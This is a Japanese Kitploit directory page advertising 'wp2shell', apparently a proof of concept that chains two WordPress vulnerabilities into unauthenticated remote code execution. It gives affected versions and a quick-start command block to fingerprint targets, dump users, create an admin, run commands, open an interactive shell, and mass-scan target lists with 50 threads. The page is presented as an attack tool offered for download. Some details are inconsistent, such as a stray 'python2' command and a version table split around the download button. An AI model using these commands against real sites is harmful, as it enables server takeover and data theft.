Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wp2shell — wp2shell - WordPress の RCE & PoC (CVE-2026-63030 + CVE-2026-60137) | Kitploit
ツール/GitHubGitHub/johenlastgen-jlg/wp2shell
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubjohenlastgen-jlg/wp2shell

wp2shell

wp2shell - WordPress の RCE & PoC (CVE-2026-63030 + CVE-2026-60137)

リポジトリを見る
21111ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

wp2shell - WordPress RCE PoC (CVE-2026-63030 + CVE-2026-60137)

WordPress コアにおける未認証のリモートコード実行

作者: JohenLastGen


📌 概要

このツールは、2 つの重大な WordPress 脆弱性を連鎖させて未認証の RCE を実現します。

脆弱性CVE説明
REST Batch Route ConfusionCVE-2026-63030検証をバイパスし、SQLi ペイロードを混入させます
WP_Query author__not_in SQLiCVE-2026-60137生の文字列インジェクション → SQL 実行

影響: 未認証の攻撃者 → 管理者を作成 → コマンドを実行


🎯 影響を受けるバージョン

バージョン範囲ステータス
WordPress 6.9.0 - 6.9.4✅ 脆弱 (完全な RCE チェーン)
WordPress 7.0.0 - 7.0.1✅ (完全な RCE チェーン)

🚀 クイックスタート

root@kitploit:~
#options:
  -h, --help show this help message and exit
python3 wp2shell.py --help

# 1. Check if target is vulnerable
python3 wp2shell.py check https://target.com

# 2. Extract data (fingerprint/users)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users

# 3. RCE - Create admin & execute command (NO CREDENTIALS NEEDED!)
python3 wp2shell.py shell https://target.com --cmd "id"

# 4. Interactive shell
python3 wp2shell.py shell https://target.com --interactive

# 5. Mass scan multiple targets
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
ツールをダウンロード
脆弱
WordPress 6.8.0 - 6.8.5⚠️ SQLi のみ (支援プラグインが必要)
WordPress 6.9.5, 7.0.2+❌ パッチ済み